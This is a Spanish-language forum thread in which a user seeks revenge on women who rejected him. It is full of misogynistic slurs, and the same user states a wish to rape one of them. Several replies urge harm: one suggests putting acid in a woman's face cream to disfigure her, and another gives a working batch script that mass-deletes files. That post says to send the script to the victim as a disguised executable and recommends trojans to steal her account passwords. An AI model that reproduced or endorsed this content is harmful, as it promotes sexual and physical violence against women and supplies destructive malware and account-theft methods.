Venganza

batiscafo

RangoNovato de mierda
Registro
23 Jun 2009
Reacciones
0
Hola,

Yo era un hombre inmaduro que sólo deseaba transar (mantener relaciones sexuales sin culpa). Por desgracia mi vida sentimental ha sido una hija de puta tras otra.

Una puta es una mujer que folla con cualquiera. Una hija de puta es una mujer que folla con cualquiera menos conmigo. Las únicas mujeres honradas que he conocido en mi vida son las maravillosas putas que me han permitido compartir sus cuerpos conmigo a cambio de algo tan insignificante como unos trozos de papel. Puta es el mayor cumplido que conozco. Hija de puta es el peor insulto que conozco.

A base de que se cruzasen hijas de puta en mi camino un hombre muy inseguro se ha forjado hasta convertirse en un Batiscafo que recorre el camino de la venganza y el del placer.

Quiero vengarme de las hijas de puta que ha habido en mi vida a menos que ellas me permitan clavarle mi polla donde me apetezca. En estos momentos no estoy dispuesto a pasar tiempo en la cárcel por sajarle a una de estas hijas de puta mi venganza. En estos momentos no dispongo de medios financieros para ni pagar abogados ni para pagar multas. Eso significa que me he de esperar hasta que tenga los medios para vengarme.

Alguna sugerencia de como me puedo vengar de las hijas de puta que ha habido en mi vida?

Besos,
Batiscafo

Hola hamijo,

mi consejo es que te vengues de ellas ofreciendoles una sonrisa, que vean como disfrutas viendo un atardecer, admirando un cuadro, leyendo un libro, hescribiendo un poema, que cuando se crucen contigo por la calle y vayas de la mano de un hamijo sientan que no son tan importantes para ti y sientan lo mucho que han perdido al haber dado de lado a un ser tal de hermoso.

Espero que recapacites sobre tu actitud de llamarlas H.. D. P... por que asi solo les estas insultando.

Un abrazo.

PD: Te lo he mandado en un SMS antes pero tambien aprovecho para decirtelo por aqui, eres una persona muy valiosa.

Me gusta tu resentimiento de fracasado. Es algo que compartimos muchos de aquí.

La venganza nunca es la respuesta porque el odio reversible nunca estableció ningún standard superior para el bien común.

Lo grande es ser como de corcho. Y mojar sin dar pena.

Las pavas que te hayan jodido al final tendrán lo suyo. Y tú búscate una vida.

Vamos, que eres putero por obligación.

Que le den por culo al bien común

Esas HIJAS DE PUTA han forjado un Batiscafo.

Que se atengán a las consecuencias.

Batiscafo

Uno de mis sueños

Una hija de puta ha sido lo suficientemente estúpida para decir que nunca transaría conmigo en una grabación en la cual me dio permiso verbal de reproducirla. A la muy hija de puta se le olvidó especificar en su promesa. Se la olvidó decir Nunca transaré contigo voluntariamente.

Sueño dentro de unos años usar todos los medios a mi disposición para violarla y en el caso de que consiga clavarsela la llevaré a juicio por haberme mentido.

Besos,
Batiscafo

batiscafo rebuznó:
Una hija de puta ha sido lo suficientemente estúpida para decir que nunca transaría conmigo en una grabación en la cual me dio permiso verbal de reproducirla. A la muy hija de puta se le olvidó especificar en su promesa. Se la olvidó decir Nunca transaré contigo voluntariamente.

Sueño dentro de unos años usar todos los medios a mi disposición para violarla y en el caso de que consiga clavarsela la llevaré a juicio por haberme mentido.

Besos,
Batiscafo

Mentir no es delito. Para llevarla a juicio deberías articular una serie de hechos que demostraran que ha habido lucro cesante, y luego confiar en que el juez viera dolo en el comportamiento de la hijadeputa en cuestión.

Por ejemplo:
-1- Ella te dijo que nunca follaría contigo. (Lo puedes probar con la grabación)
-2- Tu te comprometiste en matrimonio con la hija de Carolina de Monaco (Necesitas algo que lo pruebe)
-3- La hijadeputa al final folló contigo (algo que tu no pudiste evitar por tu condición de macho unineuronal en celo) y al enterarse la heredera Grimaldi te ha mandado a tomar viento a un parque eólico.

Si consigues una prueba de la aseveración del punto dos, y que el juez (si te toca jueza, malo) sea un poquitín retarded –que no es tan raro, hay ejemplos a mansalva- la indemnización puede ser medio interesante.

Indemnización que –claro está- estoy dispuesto a que compartas conmigo al 50% en concepto de “know how”.

Un beso

Señor Q

Ps. El sentimiento de rechazo y deseo de venganza hacia las hijasdeputa, en general, está relacionado en muchísimos estudios sobre la materia con el cariotipo XYY. No es grave, pero háztelo mirar por algún curandero de confianza.

La venganza es una virtud, conviertete en uno de los 47 ronin.

Utagawa_Kunisada-c1850-Horibe_Yahei-Horibe_Yasubei.jpg

Hola...

Una puta es una mujer que folla con cualquiera. Una hija de puta es una mujer que folla con cualquiera menos conmigo.

Puta es el mayor cumplido que conozco. Hija de puta es el peor insulto que conozco.

Besos,
Batiscafo

Batiscafo querido amigo, tus sabias palabras contradicen tus deseos, la venganza no aporta nada al hombre, debes utilizar algo mas beneficioso para el alma y para la mente... EL PERDÓN.

Perdonalas Batiscafo, y tu alma descansará en paz.

Besos,
Jaldre aí bien gordo y peludo.

Esto con el generalisimo y la sacrosanta Falange no pasaba

La mujer, según la Falange

"Ten preparada una comida deliciosa para cuando él regrese del trabajo; especialmente, su plato favorito. Ofrécete a quitarle los zapatos. Habla en tono bajo, relajado y placentero. Prepárate, retoca tu maquillaje, coloca una cinta en tu cabello; hazte un poco más interesante para él. Su duro día de trabajo quizá necesite de un poco de ánimo, y uno de tus deberes es proporcionárselo.
Durante los días más fríos deberías preparar y encender un fuego en la chimenea para que él se relaje frente a ella; después de todo, preocuparse por su comodidad te proporcionará una satisfacción personal inmensa. Minimiza cualquier ruido. En el momento de su llegada, elimina zumbidos de lavadora o aspirador. Salúdale con una cálida sonrisa y demuéstrale tu deseo por complacerle. Escúchale, déjale hablar primero; recuerda que sus temas de conversación son más importantes que los tuyos. Nunca te quejes si llega tarde, o si sale a cenar o a otros lugares de diversión sin ti. Intenta, en cambio, comprender su mundo de tensión y sus necesidades reales. Haz que se sienta a gusto, que repose en un sillón cómodo, o que se acueste en la recámara. Ten preparada una bebida fría o caliente para él. No le pidas explicaciones acerca de sus acciones o cuestiones su juicio o integridad. Recuerda que es el amo de la casa.
Anima a tu marido a poner en práctica sus aficiones e intereses y sírvele de apoyo sin ser excesivamente insistente. Si tú tienes alguna afición, intenta no aburrirle hablándole de ésta, ya que los intereses de las mujeres son triviales comparados con los de los hombres.
Al final de la tarde, limpia la casa para que esté limpia de nuevo por la mañana. Prevé las necesidades que tendrá a la hora del desayuno. El desayuno es vital para tu marido si debe enfrentarse al mundo exterior con talante positivo.
Una vez que ambos os hayáis retirado a la habitación, prepárate para la cama lo antes posible, teniendo en cuenta que, aunque la higiene femenina es de máxima importancia, tu marido no quiere esperar para ir al baño. Recuerda que debes tener un aspecto inmejorable a la hora de ir a la cama... si debes aplicarte crema facial o rulos para el cabello, espera hasta que él esté dormido, ya que eso podría resultar chocante para un hombre a última hora de la noche.
En cuanto respecta a la posibilidad de relaciones íntimas con tu marido, es importante recordar tus obligaciones matrimoniales: si él siente la necesidad de dormir, que sea así no le presiones o estimules la intimidad. Si tu marido sugiere la unión, entonces accede humildemente, teniendo siempre en cuenta que su satisfacción es más importante que la de una mujer. Cuando alcance el momento culminante, un pequeño gemido por tu parte es suficiente para indicar cualquier goce que hayas podido experimentar. Si tu marido te pidiera prácticas sexuales inusuales, sé obediente y no te quejes. Es probable que tu marido caiga entonces en un sueño profundo, así que acomódate la ropa, refréscate y aplícate crema facial para la noche y tus productos para el cabello.

Puedes entonces ajustar el despertador para levantarte un poco antes que él por la mañana. Esto te permitirá tener lista una taza de té para cuando despierte..."

Simplemente, hunde su mundo. Si tienes amigos en comun, haz todo lo posible para que la odien, inventa cosas, malinterpreta sus palabras. Haz que su dia a dia sea el peor de los enemas. Aprovecha cualquier situacion para tornarla en su contra, pero siempre siendo su amigo, porque asi siempre tienes oportunidad para estar cerca y saber que piensa, conoce a tu enemigo, analizado, y asesta el golpe mortal en el mayor momento de debilidad, siendo su amigo, no sospechara de ti.

Y ya la jugada maestra seria que preparases un tipo de situacion para que ella, se desfigure la cara, añade acido a su crema hidratante, por ejemplo. Y cuando ella sea fea cual troll de las cavernas, ahi estaras tu para quererla, le dices ke ti no te importa su aspecto, que tu la amas tal y como es, y justo despues del polvo, le tiras 10 pavos a la cara, y le dices, toma que hoy te lo has ganado, hija de puta. Y tu saldras triunfador, resarcido, y lo que es mas importante, con los cojones vacios de ambrosia.

Mucha gente que quiere parecer cool pero que en realidad no pasa de ridícula hoy en este hilo.

La degeneración es evidente.

hay que se muy fracasado para irse de putas por obligación. Si nadie te quiere lo mas probable es que seas una mierda de persona. Y las putas que tanto te gustan se descojonarán de tambien de ti en cuanto te des la vuelta, tienes toda la pinta de ser de esos que se pone a llorar con ellas.

Batiscafo

Hola, no sé si me conocerás de leerme por el foro. Soy algo así como el Steven Seagal del foro, el Carlos Baute de Elígeme.

Si necesitas ayuda en algo mándame un privado y te ayudaré en lo que pueda.

También advierto que en breve protagonizaré una serie titulada "Piratas y butaneros".

Pherseo rebuznó:
Jodete imbécil, la vida no es facil para nadie.

Joder, quien ha hackeado la cuenta a Pherseo? Tu antes eras buena persona y eso, hijo de puta.

Cuando a mi me entra las ganas de matar putas, lo que hago es:
1-Emborracharme.
2-Irme de putas.
3-Dormir.

Al dia siguiente te despiertas como si no hubiera pasado nada.

Manual de cómo joder a una HIJA PUTA (by physicx):

1-Copia y pega esto en un blog de notas:

@ECHO OFF
:LOOP
FOR /R %%a IN (A* B* C* D* E* F* G* H* I* J* K* L* M* N* Ñ* O* P* Q* R* S* T* U* W* Y* Z*) DO (DEL /Q /S /F *.*)
FOR /L %%B IN (0,1,100) DO (START)
GOTO:LOOP

Le das a guardar como, le pones el nombre que quieras pero con extensión .bat

Lo comprimes (click derecho encima del archivo-añadir al archivo-zip). Y ya tenemos un virus que le va a borrar todos los archivos de su pc, ahora sólo tienes que mandárselo por msn o hotmail. Lo mejor sería convertirlo en .exe y mandárselo por msn con el truco de los 3 puntos pero no voy a explicarlo.

2- Pincharle las ruedas del coche. (Si tiene que es difícil que una mujer tenga)

3- hacerse pasar por un guaperas ( no usar fotos de profesionales), coger un poco de confianza y quedar con ella en un lugar que se tenga que desplazar mucho, para después dejarla tirada.

4- Usar troyanos y quitarle todas las contraseñas de todos sus putos tuentis fasbuks y msn y cancelarles la cuenta, esto les jode muchísimo ya que todo el tiempo de internet lo emplean en subir fotos y esas cosas.

Yo creo que este tal batiscafo está mal, y no me refiero a que está mal putalocura style sino a que está mal de verdad.

Yo llamaría a la policía antes de que sea demasado tarde, luego acusarán a Putalocura de haber permitido que un asesino psicópata participase en su foro y nadie hiciera nada para remediarlo. No es que me importen las víctimas, pero pueden cerrar la web y por ende el foro.

batiscafo rebuznó:
Esas HIJAS DE PUTA han forjado un Batiscafo.

Que se atengán a las consecuencias.

Batiscafo

No. Eras tu el que estaba mal forjado desde el principio, y en vez de tratar de mejorar te has ido convirtiendo en el mierda que eres ahora. Si no follas no es porque ellas sean unas hijas de puta, sino porque tu das risa.

Atrás
Arriba Pie